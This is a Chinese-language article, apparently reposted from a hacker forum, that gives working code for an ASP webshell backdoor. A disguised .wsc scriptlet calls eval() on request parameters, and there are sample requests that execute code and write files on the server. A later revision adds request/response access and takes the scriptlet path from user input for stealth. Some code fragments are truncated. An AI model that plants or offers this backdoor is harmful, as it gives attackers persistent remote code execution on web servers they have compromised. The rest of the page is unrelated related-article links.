利用wsc来做一个asp后门及后续 (利用vi)

教程大全 2025-07-15 15:26:17 浏览次

ScriptCodingInfo.wsc代码如下，该文件可以改成任意后缀：

以下是引用片段：
sub lcx(b) 
eval(b) 

end sub 
]]>

backdoor.asp内容如下：

以下是引用片段：
<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx(b) 
%>

调用方法如下：

以下是引用片段：
"Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意这里的a=只能是vbs的代码，不可以接受像response、request之类的asp的东东。如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc，像Set fs = GetObject("script:")

2003服务器中不可以。算一个思路，鸡肋，谁有更好的办法完善，能够直接调用cs的asp木马的c端就好了。
#p#

突然看到了lcx巨形牛头人发了一个帖子
但是就像牛头人所说的，没有加进request和response类很不爽。于是我作了一个简单的修改。

ScriptCodingInfo.wsc 代码

以下是引用片段：
xml version="1.0" encoding="gb2312" standalone="yes"?> 
 
 
 
 
 
 
sub lcx(b,a,c) 
set response=c ’加入request和response进来。就可以直接调用了 
set request=a ’修改 by:phpeval.cn 
eval(b) 
end sub 
]]>

test.asp代码：

<% 
b=request("a") 
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop") 
fs.lcx b,request,response 
%>

测试方法：

以下是引用片段：
"response.write(request(""c"")):response.end")&c=phpeval

不知道这是不是lcx巨形牛头人所说的那个c端。我一直不太理解“能够直接调用cs的asp木马的c端就好了”lcx巨牛的这句话的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段：
"response.write(request(""c""))
:response.end")&b=script:d:/web/wwwroot/ScriptCodingInfo.
wsc%23haiyangtop&c=phpeval

这样好象更有诱惑性。

【编辑推荐】

责任编辑：佚名来源：黑客风云

backdoor 牛头人木马 request 调用

分享到微信

微信扫码分享

分享到微博

相关推荐

怎样做一个快乐的ASP.NET程序员

有的人想成为一个"杰出"的程序员,或者"资深"的程序员,简单来说就是"大牛"级的人物。本文将给大家讲讲怎样做一个快乐的ASP.NET程序员。

2011-12-20 10:02:01

ASP.NET

做一个有想法的程序员 做一个属于自己的神器

我就是那位之前在博客园上发布富文本编辑器wangEditor的那位。目前wangEditor编辑器慢慢趋于稳定，虽然用户量还算比较少，但是目前提问题的人也不是特别多了。于是，慢慢的这段时间又开始有时间可以“作”了。

2015-07-03 11:27:30

程序员自己神器

如何做一个好重构

做个好重构真的挺不容易的，无论是从专业角度还是从生活角度，缺一不可，保持一个乐观、热情、积极的心，不断学习，让自己活得简单、快乐，此足矣。

2012-12-17 12:58:18

Web jQuery 重构

如何做一个对账系统

在互联网行业中只要涉及到支付，必然就会有对账的需求，几乎所有互联网公司的业务中多多少少的都会涉及到支付，大一点的公司甚至都标配有了自己的第三方支付公司，因此对账具有普遍性。对账系统是支付体系中最重要的一环，也是保证交易、资金安全的最后一道防线。

2017-06-30 15:18:24

对账系统互联网

探索RxJS - 做一个github小应用

本文是一篇RxJS实战教程，利用RxJS和githubAPI来一步步做一个github小应用。因此，文章的重点是解释RxJS的使用，而涉及的ES6语法、webpack等知识点不予讲解。

2016-11-23 18:13:44

javascript rxjs reactivex

为自己做一个简单记账簿

当每个月收到信用卡账单时，笔者总会又惊又惑。为什么上个月又花了那么多钱？为了有效的管理自己的资金动态，笔者利用SQLite为自己做了一个简单记账簿。

2011-02-28 09:22:47

SQLite 记账簿

如何在Linux中安插一个后门？

Linux内核是开源的代码，能不能向其中安插一个后门呢这是一件难度很高的操作，但是有人却差点儿成功了，我们来看看这是怎么回事。

2019-09-10 09:12:54

怎样做一个圆环放大的动画

本篇最主要还是想说一件事：当你发现用html不太好做动画时，可以尝试用svg做一下，几行svg就能做出一个很顺滑的动画。

2018-01-04 16:04:35

圆环放大动画

尝试用 ArkUI 做一个相册应用

新的编译框架基于TS，相比于之前的JS代码更简洁，将原来的js、hml、css合并为了.ets一个文件，而且更接近自然语义，学习成本很低。

2021-12-17 10:06:42

鸿蒙 HarmonyOS 应用

如果你是黑客，会利用Windows后门来做些什么？

最近，安全研究人员发现了一个新版本的Windows恶意软件，该恶意软件可打开WindowsPC上的RDP端口，以便进行远程访问。

2020-05-26 10:38:51

安全黑客 Windows

遇见大数据可视化：来做一个数据可视化报表

上篇文章简单的介绍了数据可视化的基础，将数据进行设计可视化后，可以让我们有一种全新的方式去认识数据，改变对数据的呈现和思考方式。那现在就让我们开始做一份数据的可视化图表，一步步的来看下我们如何获取数据，以及如何进行可视化的展示。

2017-06-19 08:30:35

大数据数据可视化报表

用Python做一个简单的翻译工具

有时候，当我在命令行环境下写代码的时候，懒得再切换到浏览器里等待页面的加载。于是我就想，能否用万能的python制作一个命令行下的翻译工具呢？来看看吧。

2020-07-20 10:00:52

Python 翻译工具命令行

用 Python 做一个按键记录器

按键记录器，就你在电脑上的每个按键，都会被记录下来，可以进行操作追踪，当然了，你在网站上输入的用户名密码等敏感信息也会被记录下来。

2021-12-01 07:02:55

Python 记录器按键

做一个有脑子的程序员

程序员是最理性的一个群人，除非面对电子产品的时。程序员是一群高智商的群体，唯一的缺点就是发际线总是很难防守。

2019-04-22 10:25:52

程序员技术职场

池建强：不要做一个果粉

骚瑞，最近看鲁迅先生的「枣树」文体看多了，一不留神就写成了枣树体。实际情况是，一部是iPhone5，另一部是米3。每次我用米3发微博的时候就会有人在评论中善意的留言：Mac君你不是果粉么，怎么会用Android手机呢，还是小米？

2014-04-29 10:50:16

池建强

10行代码-利用Python做一个微信聊天机器人（简单易懂）

是的也许你听说过QQ机器人、听说过图灵机器人，但今天我们只需要10行代码做一个微信机器人！当然，如果你想把这个机器人做的更加完善，那代码就不止10行啦，咱这篇文章算是基础案例吧，让大家知道有这么回事。

2018-06-08 16:18:43

Python 微信聊天机器人

做一个APP需要多少钱？几万块钱，真的能做一个APP出来吗？

因为我们有软件开发的业务，所以经常会有客户来问我们，开发一款app，到底需要多少钱。今天我们讲一讲，做一个app到底需要多少钱。

2021-12-19 22:00:31

APP 软件开发开发

回应咆哮：做一个有尊严的运维

本周在系统频道下发布了一篇有关运维咆哮的文章，文章引起了广大网友的争论。我觉得作者咆哮的有理，但是有些偏激。笔者接触过不少的运维包括Windows和Linux，笔者认为不论什么样的运维，管理什么样的服务器都要努力做一个有尊严的运维。

2011-10-27 21:13:28

用Python做一个房价预测小工具！

今天给大家介绍一个非常适合新手入门的机器学习实战案例。一起来看看吧。

2022-03-30 15:11:26

Python 房价工具

做一个iPhone应用需要花多少钱？

这是来自新加坡的iOS开发者KentNguyen发表在1月底的一篇博文。这篇吐槽文在iOS开发圈子里流传甚广，从原文150多个评论就可见一斑，现翻译如下。让我们开门见山吧：做一个iPhone应用需要花多少钱

2012-04-10 16:26:46

微博

QQ

微信

复制链接

微信扫码分享

技术栈公众号

业务
速览

在线客服

媒体

CIOAge HC3i

社区

博客鸿蒙开发者社区

教育

学堂精培企业培训 CTO训练营

上一篇阿里开源后浪云混部系统Koordinator技术揭

下一篇Ubuntu上安装ElisaKDE音乐播放器ubuntu系统

利用wsc来做一个asp后门及后续 (利用vi)

彩虹岛的暗夜之花在哪得到？

续三侠剑电子书在哪下载

发表评论

热门推荐

如何查看Linux系统的网络流量-查看linux流量 (如何查看linux是x86平台还是arm)

Linux-linux新建标签-简单易用的标签管理方法 (linux系统)

查询mysql字符集 (查询MySQL版本的命令)

助您高效操作数据-mysql的连接数据库-掌握MySQL连接数据库的方法 (提高操作效率)

简单轻松搞定！-Linux实现免密登录-Linux免密登录 (三个方法教你搞定)

linuxarp表-ARP表-Linux-链接网络世界的重要桥梁 (linux安装jdk)

ProFTPD字符编码SQL注入漏洞 (proftp安卓下载)

win2003-关闭不需要的数据库服务-图文-禁止不用的web服务扩展的方法 (win2008r2)

SQL-Server扩展存储过程经典版 (sqlserver)

2022年未来展望之云计算 (2022年未退税还能继续退税吗)

SQL数据库的性能调优方法有哪些？ (sql数据库入门基础知识)

如何在免费云服务器上配置域名解析 (如何在免费云玩游戏)